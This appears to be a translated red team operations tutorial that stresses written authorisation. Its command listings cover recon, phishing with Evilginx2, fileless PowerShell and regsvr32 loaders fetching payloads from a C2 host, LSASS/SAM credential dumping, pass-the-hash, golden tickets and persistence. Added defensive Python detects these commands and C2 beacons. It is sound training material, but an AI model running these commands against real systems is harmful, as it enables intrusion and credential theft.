1. Introduction to Red Team Operations
A Red Team is a security group that realistically simulates cyber attacks to test an organisation's defences (the Blue Team). Unlike traditional penetration testing, which usually focuses on finding technical vulnerabilities, Red Team Operations imitate the Tactics, Techniques, and Procedures (TTPs) of real adversaries in order to measure the organisation's overall detection and response capability.
Red Team vs Penetration Testing
| Aspect | Penetration Testing | Red Team Operations |
|---|---|---|
| Goal | Find as many vulnerabilities as possible | Achieve specific objectives (flags) without being detected |
| Scope | Usually limited to specific technical targets | The whole organisation: physical, social, technical |
| Duration | 1-4 weeks | 4-12 weeks or more |
| Approach | Automated + manual testing | Adversary simulation with realistic TTPs |
| Detection | Little effort to avoid detection | Avoids detection as much as possible |
| Reporting | List of vulns + recommendations | Narrative report, attack story, gap analysis |
| Team | 1-3 testers | 3-8+ operators with different roles |
Red Team Operations MUST be carried out with written authorisation (Rules of Engagement) from the system owner. Operating without authorisation is a cybercrime that violates the ITE Law (UU ITE) in Indonesia and can be prosecuted.
```text
RED TEAM ATTACK LIFECYCLE

1. RECON         -> 2. WEAPONIZATION -> 3. DELIVERY      -> 4. EXPLOIT
   - OSINT           - C2                - Phishing         - Execute
   - Scan            - Payload           - Physical         - Install
   - Enum            - Implant           - Supply           - Persist
                                                                 |
                                                                 v
8. CLEAN UP      <- 7. EXFIL          <- 6. OBJECTIVES   <- 5. LATERAL MOVE
   - Remove          - Data exfil        - Flag achieved    - Pivot
   - Clean logs      - C2 comm                              - Creds
                                                            - Access

Blue Team Detection Points:
[SIEM] [EDR] [NDR] [WAF] [DLP] [SOC] [Honeypots]
```
2. Planning & Scoping
Planning is the most critical phase of a Red Team engagement. Poor planning can lead to scope creep, legal problems, or even damage to production systems.
2.1 Rules of Engagement (RoE)
```text
# ===== RULES OF ENGAGEMENT (RoE) TEMPLATE =====

# 1. AUTHORIZATION
#    - Written authorization letter from C-level management
#    - Approved scope and targets
#    - Engagement duration
#    - Emergency contact and escalation path

# 2. SCOPE
#    In-Scope:
#    - *.target.com (all subdomains)
#    - 10.0.0.0/8 (internal network)
#    - Physical: Buildings A and B, Jakarta
#    - Social engineering: email phishing against specific departments
#
#    Out-of-Scope:
#    - Production database (read-only only)
#    - Critical infrastructure (SCADA/ICS)
#    - Third-party systems
#    - Denial of Service (DoS) attacks

# 3. CONSTRAINTS
#    - Do not disrupt business operations
#    - Do not damage or delete data
#    - Do not encrypt data (ransomware simulation)
#    - Target window: business hours only, or 24/7?
#    - Data handling: all sensitive data is encrypted

# 4. COMMUNICATION
#    - Primary: encrypted channel (Signal/Keybase)
#    - Emergency: phone call to the POC
#    - Status update: every 48 hours
#    - Kill switch: a code word that halts the operation

# 5. OBJECTIVES (FLAGS)
#    - Flag 1: Access to internal systems
#    - Flag 2: Access to a sensitive database
#    - Flag 3: Domain admin access
#    - Flag 4: Exfiltration of sensitive data (simulated)
#    - Flag 5: Access to financial systems

# 6. LEGAL
#    - NDA (Non-Disclosure Agreement)
#    - Liability waiver
#    - Data destruction confirmation
#    - Insurance requirements
```
2.2 MITRE ATT&CK Planning
```text
# ===== MITRE ATT&CK PLANNING =====
# MITRE ATT&CK is a framework that documents the
# TTPs (Tactics, Techniques, and Procedures) of adversaries

# TACTICS (goals):
# TA0043 - Reconnaissance
# TA0042 - Resource Development
# TA0001 - Initial Access
# TA0002 - Execution
# TA0003 - Persistence
# TA0004 - Privilege Escalation
# TA0005 - Defense Evasion
# TA0006 - Credential Access
# TA0007 - Discovery
# TA0008 - Lateral Movement
# TA0009 - Collection
# TA0011 - Command and Control
# TA0010 - Exfiltration
# TA0040 - Impact

# ===== EXAMPLE ATTACK PLAN =====

# Phase 1: Reconnaissance (Week 1)
# ----------------------------------
# T1595.002 - Active Scanning: Vulnerability Scanning
# T1592.002 - Gather Victim Host Information: Software
# T1589.002 - Gather Victim Identity Information: Email
# Tools: Nmap, Shodan, theHarvester, Recon-ng

# Phase 2: Initial Access (Week 2)
# ----------------------------------
# T1566.001 - Phishing: Spearphishing Attachment
# T1566.002 - Phishing: Spearphishing Link
# T1190 - Exploit Public-Facing Application
# Tools: GoPhish, SET, Cobalt Strike, Evilginx2

# Phase 3: Execution & Persistence (Week 3)
# -------------------------------------------
# T1059.001 - Command and Scripting Interpreter: PowerShell
# T1053.005 - Scheduled Task/Job: Scheduled Task
# T1547.001 - Boot or Logon Autostart: Registry Run Keys
# Tools: Cobalt Strike, Covenant, Sliver

# Phase 4: Privilege Escalation (Week 4)
# ---------------------------------------
# T1068 - Exploitation for Privilege Escalation
# T1055.001 - Process Injection: DLL Injection
# T1134 - Access Token Manipulation
# Tools: Mimikatz, Rubeus, PrintSpoofer

# Phase 5: Lateral Movement (Week 5)
# ------------------------------------
# T1021.002 - Remote Services: SMB/Windows Admin Shares
# T1021.001 - Remote Services: RDP
# T1550.002 - Use Alternate Auth: Pass the Hash
# Tools: CrackMapExec, Impacket, Evil-WinRM

# Phase 6: Objective & Exfiltration (Week 6)
# --------------------------------------------
# T1005 - Data from Local System
# T1041 - Exfiltration Over C2 Channel
# T1567 - Exfiltration Over Web Service
# Tools: Custom exfil scripts, C2 channels
```
3. Reconnaissance
```bash
# ===== PASSIVE RECONNAISSANCE =====

# 1. OSINT framework
# Subdomain enumeration
subfinder -d target.com -o subdomains.txt
amass enum -passive -d target.com -o amass_results.txt
assetfinder --subs-only target.com | tee assetfinder.txt

# 2. Email harvesting
theHarvester -d target.com -b google,linkedin,github -l 500

# 3. Technology fingerprinting
whatweb https://target.com
wappalyzer target.com

# 4. Shodan / Censys
# Look for exposed services
# shodan search "org:Target ssl.cert.subject.CN:target.com"
# censys search "services.tls.certificates.leaf.names: target.com"

# 5. GitHub/GitLab secrets
trufflehog git https://github.com/target-org --regex
git-secrets --scan

# 6. DNS enumeration
dnsrecon -d target.com -t std
dnsenum target.com

# 7. Certificate Transparency
curl -s "https://crt.sh/?q=%25.target.com&output=json" | jq '.[].name_value' | sort -u

# ===== ACTIVE RECONNAISSANCE =====

# 1. Port scanning (keep it stealthy)
# TCP SYN scan (stealthier)
nmap -sS -T2 -Pn --top-ports 1000 target.com
# Service version detection
nmap -sV -sC -T3 -p- target.com -oA full_scan

# 2. Web application scanning
# Directory enumeration
feroxbuster -u https://target.com -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
# Parameter discovery
arjun -u https://target.com/api/endpoint

# 3. Network mapping
# SNMP enumeration
onesixtyone -c community_strings.txt target_range
snmpwalk -v2c -c public target_ip
# SMB enumeration
enum4linux -a target_ip
smbclient -L //target_ip -N

# 4. Cloud reconnaissance
# AWS S3 bucket enumeration
# cloud_enum -k target-name
# S3Scanner scan --bucket-file buckets.txt
```
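The crt.sh query above returns JSON whose `name_value` field can hold several names separated by newlines, which is why the one-liner pipes through `sort -u`. As an added example that is not part of the original page, the Python below parses that format and compares it against a defender's asset inventory to surface certificates issued for hosts nobody is tracking; the JSON records, hostnames, dates and inventory are all constructed.

```python
import json

# Constructed crt.sh-style output: the real endpoint returns a list of records with
# these field names, but every value below is invented.
CRTSH_JSON = """[
 {"issuer_name": "C=US, O=Let's Encrypt, CN=R3", "common_name": "www.target.com",
  "name_value": "target.com\\nwww.target.com", "not_before": "2024-01-10T00:00:00"},
 {"issuer_name": "C=US, O=Let's Encrypt, CN=R3", "common_name": "vpn.target.com",
  "name_value": "vpn.target.com", "not_before": "2024-02-01T00:00:00"},
 {"issuer_name": "C=US, O=DigiCert Inc", "common_name": "*.target.com",
  "name_value": "*.target.com\\ntarget.com", "not_before": "2023-11-05T00:00:00"},
 {"issuer_name": "C=US, O=Let's Encrypt, CN=R3", "common_name": "old-jenkins.target.com",
  "name_value": "old-jenkins.target.com", "not_before": "2022-06-20T00:00:00"}
]"""

def names_from_crtsh(raw):
    """Flatten every name_value into one sorted, de-duplicated list of hostnames."""
    names = set()
    for rec in json.loads(raw):
        for name in rec["name_value"].splitlines():
            if name.strip():
                names.add(name.strip().lower())
    return sorted(names)

def unknown_hosts(raw, inventory):
    """Hostnames present in CT logs but missing from the defender's asset inventory.
    Wildcard entries are skipped: they are certificate scope, not hosts."""
    known = {h.lower() for h in inventory}
    return [n for n in names_from_crtsh(raw) if n not in known and not n.startswith("*.")]

def first_seen(raw):
    """Earliest not_before per hostname: an old certificate for a host that is not in
    the inventory is the classic sign of an asset that was forgotten, not retired."""
    seen = {}
    for rec in json.loads(raw):
        for name in rec["name_value"].splitlines():
            name = name.strip().lower()
            seen[name] = min(seen.get(name, rec["not_before"]), rec["not_before"])
    return seen
```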
4. Initial Access
```text
# ===== INITIAL ACCESS TECHNIQUES =====

# 1. SPEAR PHISHING
# Targeted phishing with a tailored payload
# GoPhish setup:
#   - Create a campaign with a realistic email template
#   - Landing page that mimics the target (credential harvesting)
#   - Attachment: macro-enabled documents, LNK files, ISO

# What makes a phishing email effective:
#   - A relevant pretext (HR, IT support, vendor)
#   - Personalisation (victim's name, department)
#   - Urgency (deadline, security alert)
#   - Sender spoofing (DMARC bypass)

# 2. EVILGINX2: Advanced Phishing
# Reverse-proxy phishing to bypass 2FA
# ./evilginx2
# > config domain phish.com
# > phishlets hostname office365 login.target.com
# > phishlets enable office365
# > lures create office365
# > lures get-url 1

# 3. WATERING HOLE
# Compromise a website the target visits often
# Inject malicious JavaScript for browser exploitation

# 4. CREDENTIAL STUFFING
# Use breach data to access VPNs/portals
# Check https://haveibeenpwned.com for breach data

# 5. PHYSICAL ACCESS
# USB drop attack (Hak5 USB Rubber Ducky)
# Tailgating into restricted areas
# RFID cloning for building access

# ===== POST INITIAL ACCESS =====
# After gaining initial access:
# 1. Stabilise the access (C2 beacon)
# 2. Enumerate the local system
# 3. Look for credentials and sensitive information
# 4. Decide the next step (pivot, escalate)
```
5. Execution & Post-Exploitation
```text
# ===== EXECUTION TECHNIQUES =====

# 1. LIVING OFF THE LAND (LOLBINS)
# Use tools built into the OS to evade AV/EDR

# PowerShell Empire / Covenant
# Use PowerShell for execution without writing a file to disk
powershell -ep bypass -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('https://c2.server.com/agent.ps1')"

# MSBuild execution (AppLocker bypass)
# Save the payload as XML and run it with MSBuild
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe payload.xml

# InstallUtil execution
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U payload.dll

# Regsvr32 (SCT payload)
regsvr32 /s /n /u /i:https://c2.server.com/payload.sct scrobj.dll

# 2. DLL HIJACKING
# Find DLLs loaded from a writable path
# Tools: Process Monitor, SharpDLLProxy
# Replace or plant a malicious DLL

# 3. PROCESS INJECTION
# Inject code into an already running process
# Process Hollowing, APC Injection, Thread Hijacking

# ===== CREDENTIAL ACCESS =====

# 1. Mimikatz: Credential Dumping
# Nowadays: use a version you compiled yourself
# or use Invoke-Mimikatz (PowerShell)
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit

# 2. SAM Database Dump
reg save hklm\sam C:\temp\sam
reg save hklm\system C:\temp\system
# Offline hash extraction with impacket:
secretsdump -sam sam -system system LOCAL

# 3. LSASS Memory Dump
# Procdump (a signed Microsoft tool!)
procdump.exe -accepteula -ma lsass.exe C:\temp\lsass.dmp
# Mimikatz offline:
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonpasswords" exit

# 4. Kerberoasting
# Request TGS tickets for service accounts
# and crack them offline
impacket-GetUserSPNs target.com/user:password -request -outputfile hashes.txt
hashcat -m 13100 hashes.txt rockyou.txt

# 5. AS-REP Roasting
# Request AS-REPs for accounts without pre-authentication
impacket-GetNPUsers target.com/ -usersfile users.txt -format hashcat -outputfile asrep_hashes.txt
```
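From the Blue Team side, the command lines in this section are exactly what EDR and Sysmon process-creation telemetry should catch. The Python detector below is an added example, not code from the page: it runs simple command-line rules over constructed Sysmon Event ID 1 style records and maps each hit to an ATT&CK technique. The IDs for Regsvr32, InstallUtil, MSBuild and the two credential-dumping sub-techniques come from the public ATT&CK catalogue; the host names, parent processes and the regex rules themselves are assumptions.

```python
import re
from dataclasses import dataclass

# Rules keyed on the command lines shown above; each maps a regex to the ATT&CK
# technique it indicates. Real rules would also need to cover obfuscated variants.
RULES = [
    ("T1059.001", re.compile(r"powershell.*(-ep\s+bypass|-w\s+hidden|IEX|DownloadString)", re.I)),  # PowerShell
    ("T1127.001", re.compile(r"msbuild\.exe\s+\S+\.xml", re.I)),                 # MSBuild with an .xml "project"
    ("T1218.004", re.compile(r"installutil\.exe.*\s/U\s", re.I)),               # InstallUtil /U trick
    ("T1218.010", re.compile(r"regsvr32.*/i:https?://.*scrobj\.dll", re.I)),    # Regsvr32 remote scriptlet
    ("T1003.001", re.compile(r"procdump.*lsass|sekurlsa::", re.I)),             # LSASS memory access
    ("T1003.002", re.compile(r"reg\s+save\s+hklm\\(sam|system)", re.I)),        # SAM/SYSTEM hive export
]

@dataclass
class ProcessEvent:          # the Sysmon Event ID 1 fields this example uses
    host: str
    parent_image: str
    command_line: str

def match_rules(event):
    """Technique IDs whose regex hits this event's command line."""
    return [tid for tid, rx in RULES if rx.search(event.command_line)]

def triage(events):
    """Map each host to the set of techniques seen on it; hosts with no hits are omitted."""
    hits = {}
    for ev in events:
        for tid in match_rules(ev):
            hits.setdefault(ev.host, set()).add(tid)
    return hits

# Constructed sample events (host names and the CI job are invented).
SAMPLE_EVENTS = [
    ProcessEvent("WS-042", "outlook.exe",
                 "powershell -ep bypass -w hidden -c \"IEX (New-Object Net.WebClient)"
                 ".DownloadString('https://c2.server.com/agent.ps1')\""),
    ProcessEvent("WS-042", "cmd.exe",
                 "regsvr32 /s /n /u /i:https://c2.server.com/payload.sct scrobj.dll"),
    ProcessEvent("SRV-DC1", "cmd.exe", "procdump.exe -accepteula -ma lsass.exe C:\\temp\\lsass.dmp"),
    ProcessEvent("SRV-DC1", "cmd.exe", "reg save hklm\\sam C:\\temp\\sam"),
    ProcessEvent("BUILD-01", "jenkins.exe",   # benign developer use, should not match
                 r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe build.proj"),
]
```

A PowerShell launched by an Office parent, as in the first sample, is worth an extra rule of its own in practice; the `parent_image` field is kept so that rule can be added.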
6. Lateral Movement
```text
# ===== LATERAL MOVEMENT TECHNIQUES =====

# 1. PASS THE HASH (PtH)
# Use the NTLM hash directly, no password needed
crackmapexec smb 10.10.10.0/24 -u admin -H 'aad3b435b51404eeaad3b435b51404ee:hash_here'
evil-winrm -i 10.10.10.100 -u admin -H 'hash_here'

# 2. PASS THE TICKET (PtT)
# Use a Kerberos ticket (TGT/TGS)
# Export the ticket from Mimikatz:
mimikatz.exe "kerberos::ptt ticket.kirbi"
# Or with Rubeus:
Rubeus.exe ptt /ticket:base64_ticket

# 3. OVERPASS THE HASH / PASS THE KEY
# From an NTLM hash, obtain a Kerberos TGT
mimikatz.exe "sekurlsa::pth /user:admin /domain:target.com /ntlm:hash /run:cmd.exe"

# 4. PSExec / WMIExec / SMBExec
# Remote execution on other systems
impacket-psexec target.com/admin:password@10.10.10.100
impacket-wmiexec target.com/admin:password@10.10.10.100
impacket-smbexec target.com/admin:password@10.10.10.100

# 5. RDP
# Remote desktop to another system
xfreerdp /u:admin /p:password /v:10.10.10.100 /dynamic-resolution

# 6. SSH TUNNELING
# Build a tunnel to reach the internal network
ssh -D 1080 user@pivot_host
# Or remote port forwarding:
ssh -R 8080:internal_host:80 user@external_server

# 7. BLOODHOUND: AD Attack Path Mapping
# Collect data
SharpHound.exe -c All --zipfilename data.zip
# Or from Linux:
bloodhound-python -u user -p password -d target.com -c All

# Analyse with the BloodHound GUI
# Look for the shortest path to Domain Admin
# Common attack paths:
#   - Kerberoastable accounts with a path to DA
#   - Unconstrained delegation
#   - DCSync rights
#   - Admin access to computers
```
7. Persistence & C2
```text
# ===== PERSISTENCE TECHNIQUES =====

# 1. REGISTRY RUN KEYS
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "UpdateService" /t REG_SZ /d "C:\Users\Public\agent.exe" /f

# 2. SCHEDULED TASKS
schtasks /create /tn "SystemUpdate" /tr "C:\Users\Public\agent.exe" /sc onlogon /ru SYSTEM

# 3. WMI EVENT SUBSCRIPTION
# A persistent WMI event that runs the payload
# on a given condition (timer, logon, etc.)

# 4. STARTUP FOLDER
copy agent.exe "C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\"

# 5. DLL SIDE-LOADING
# Plant a DLL in a directory loaded by a legitimate app

# 6. GOLDEN TICKET (Kerberos)
# Forge a TGT with the KRBTGT hash: permanent access
mimikatz.exe "kerberos::golden /user:admin /domain:target.com /sid:S-1-5-21-xxx /krbtgt:hash /id:500 /ptt"

# 7. SKELETON KEY
# Patch LSASS to accept a universal password
mimikatz.exe "misc::skeleton"

# ===== COMMAND AND CONTROL (C2) =====

# C2 frameworks:

# 1. Cobalt Strike (commercial, $3,500+/year)
#    - Industry standard for Red Teams
#    - Malleable C2 profiles
#    - Beacon-based
#    - SOCKS proxy, lateral movement tools

# 2. Sliver (open source)
#    - Go-based C2 framework
#    - Multiplayer (team collaboration)
#    - HTTP, DNS, WireGuard C2 channels
#    - Armory (plugin marketplace)
sliver-server
> generate --mtls 10.10.10.1 --os windows --arch amd64 --save agent.exe
> mtls
> sessions

# 3. Covenant (.NET C2)
#    - ASP.NET Core based
#    - Web UI
#    - Grunt (implant) management

# 4. Mythic (open source)
#    - Modern C2 framework
#    - Multiple agent types
#    - GraphQL API

# ===== C2 EVASION =====
# 1. Domain fronting: use a CDN to hide the C2
# 2. Malleable C2: customise traffic so it looks like a real application
# 3. Encrypted channels: HTTPS, DNS-over-HTTPS
# 4. Redirectors: Cloudflare Workers, AWS Lambda
# 5. Sleep timers: reduce beacon frequency
# 6. Jitter: randomise beacon intervals
```
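The sleep timer and jitter settings listed under C2 evasion are what network detection (the NDR box in the lifecycle diagram) works against. As an added example that is not part of the original page, the Python below groups outbound flows by source and destination and flags pairs whose connection intervals are too regular to be a person; the flow records, addresses and the 0.4 coefficient-of-variation threshold are constructed assumptions. It also shows why jitter alone is a weak hiding place: uniform jitter of plus or minus j gives a coefficient of variation of about j/sqrt(3).

```python
import statistics
from collections import defaultdict

def beacon_score(timestamps):
    """(mean gap, coefficient of variation of the gaps) for one src->dst pair, or
    None when there are too few connections to judge periodicity."""
    if len(timestamps) < 6:
        return None
    ts = sorted(timestamps)
    gaps = [b - a for a, b in zip(ts, ts[1:])]
    mean = statistics.fmean(gaps)
    return mean, (statistics.pstdev(gaps) / mean if mean else float("inf"))

def find_beacons(flows, max_cv=0.4):
    """Group outbound flows by (src, dst) and keep the pairs whose gaps are regular
    enough to look like a sleep-timer beacon. Uniform +/-25% jitter gives a CV of
    about 0.25/sqrt(3) = 0.14, so it stays well inside the threshold."""
    by_pair = defaultdict(list)
    for src, dst, t in flows:
        by_pair[(src, dst)].append(t)
    return {pair: s for pair, ts in by_pair.items()
            if (s := beacon_score(ts)) and s[1] <= max_cv}

def _times(start, gaps):
    """Turn a list of inter-connection gaps (seconds) into absolute timestamps."""
    out, t = [start], start
    for g in gaps:
        t += g
        out.append(t)
    return out

# Constructed flow records (src, dst, epoch seconds); addresses are documentation ranges.
BEACON_FIXED = ("10.0.5.20", "203.0.113.10")   # 60 s sleep, no jitter
BEACON_JITTER = ("10.0.5.21", "203.0.113.11")  # 60 s sleep, +/-25% jitter
BROWSING = ("10.0.5.22", "198.51.100.7")       # a person clicking around
FLOWS = (
    [(*BEACON_FIXED, t) for t in _times(1_700_000_000, [60] * 20)]
    + [(*BEACON_JITTER, t) for t in _times(1_700_000_000, [52, 71, 64, 48, 58, 73, 61,
        55, 69, 47, 66, 59, 51, 74, 63, 57, 68, 49, 62, 70])]
    + [(*BROWSING, t) for t in _times(1_700_000_000, [3, 1, 420, 2, 7, 900, 15, 2, 1,
        300, 45, 1, 2, 1200, 5, 9, 2, 600, 30, 3])]
)
```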
8. Red Team Tools & Frameworks
| Category | Tools | Notes |
|---|---|---|
| C2 Framework | Cobalt Strike, Sliver, Mythic, Covenant | Command & Control |
| Reconnaissance | Amass, subfinder, Recon-ng, SpiderFoot | OSINT & enumeration |
| Phishing | GoPhish, Evilginx2, SET | Social engineering |
| Exploitation | Metasploit, CrackMapExec, Impacket | Exploit & lateral movement |
| Credential | Mimikatz, Rubeus, LaZagne | Credential harvesting |
| Evasion | ScareCrow, NimCrypt, Freeze | AV/EDR bypass |
| AD Attack | BloodHound, ADRecon, PingCastle | Active Directory analysis |
| Reporting | Cherry Tree, Dradis, PlexTrac | Documentation & reporting |
9. Reporting & Debrief
```text
# ===== RED TEAM REPORT STRUCTURE =====

# 1. EXECUTIVE SUMMARY (1-2 pages)
#    - Summary for C-level management
#    - What was done, what was found
#    - Overall risk rating
#    - Key findings and recommendations

# 2. ENGAGEMENT OVERVIEW
#    - Scope and objectives
#    - Operation timeline
#    - Team involved
#    - Rules of engagement

# 3. ATTACK NARRATIVE (the most important part!)
#    Tell the story of the attack from start to finish:
#
#    "On day 3, the team obtained an employee's
#    credentials through a phishing email posing
#    as an IT support notification. These credentials
#    gave access to the VPN and from there to the
#    internal network..."
#
#    Each stage is described with:
#    - What was done
#    - Why it worked
#    - Screenshots/evidence
#    - MITRE ATT&CK technique ID

# 4. TECHNICAL FINDINGS
#    Finding 1: [Title]
#    ├── Severity: Critical/High/Medium/Low
#    ├── MITRE ATT&CK: T1566.001
#    ├── Description: technical details
#    ├── Evidence: screenshots, logs
#    ├── Impact: business impact
#    └── Recommendation: how to fix it

# 5. DETECTION GAP ANALYSIS
#    - Which stages did the Blue Team detect?
#    - Which stages were NOT detected?
#    - What was the average time to detection?
#    - Did the SOC respond appropriately?

# 6. MITIGATION RECOMMENDATIONS
#    Prioritised by risk:
#    1. [CRITICAL] Implement MFA on all systems
#    2. [HIGH] Network segmentation
#    3. [HIGH] EDR deployment
#    4. [MEDIUM] Security awareness training
#    5. [MEDIUM] Log monitoring improvement

# 7. APPENDICES
#    - Full tool logs
#    - Evidence screenshots
#    - MITRE ATT&CK heat map
#    - Raw data exports
```
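The detection gap analysis in part 5 of the report answers its four questions against the technique list from the ATT&CK plan in section 2.2. The Python below is an added example, not the page's own tooling: it takes a constructed engagement record (the plan's technique IDs paired with invented detection outcomes and alert timings) and produces per-tactic coverage, mean time to detect, and the list of undetected techniques that become the gap findings.

```python
from collections import defaultdict

# Constructed engagement record: techniques from the attack plan in section 2.2,
# whether the Blue Team raised an alert, and minutes from execution to that alert.
# The detection outcomes and timings are invented for the example.
ENGAGEMENT = [
    # (technique, tactic, detected, minutes_to_detect)
    ("T1595.002", "Reconnaissance",       True,   15),
    ("T1589.002", "Reconnaissance",       False, None),
    ("T1566.001", "Initial Access",       True,  240),
    ("T1566.002", "Initial Access",       False, None),
    ("T1059.001", "Execution",            True,   10),
    ("T1053.005", "Persistence",          False, None),
    ("T1547.001", "Persistence",          False, None),
    ("T1055.001", "Privilege Escalation", False, None),
    ("T1021.002", "Lateral Movement",     True,  720),
    ("T1550.002", "Lateral Movement",     False, None),
    ("T1041",     "Exfiltration",         False, None),
]

def coverage_by_tactic(records):
    """{tactic: (detected, total)} so the report shows where coverage is thin."""
    stats = defaultdict(lambda: [0, 0])
    for _, tactic, detected, _ in records:
        stats[tactic][1] += 1
        stats[tactic][0] += int(detected)
    return {t: tuple(v) for t, v in stats.items()}

def undetected(records):
    """Technique IDs that never produced an alert: each becomes a gap finding."""
    return [tid for tid, _, detected, _ in records if not detected]

def mean_time_to_detect(records):
    """Average minutes to first alert across the detected techniques, or None."""
    times = [m for _, _, detected, m in records if detected]
    return sum(times) / len(times) if times else None

def gap_report(records):
    """Lines for the Detection Gap Analysis section, worst-covered tactics first."""
    ranked = sorted(coverage_by_tactic(records).items(), key=lambda kv: kv[1][0] / kv[1][1])
    lines = [f"{tactic}: {hit}/{total} techniques detected" for tactic, (hit, total) in ranked]
    mttd = mean_time_to_detect(records)
    lines.append(f"Mean time to detect: {mttd:.0f} min" if mttd is not None else "No detections")
    lines.append("Undetected: " + ", ".join(undetected(records)))
    return lines
```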
10. Comprehension Quiz
Test your understanding of Red Team Operations: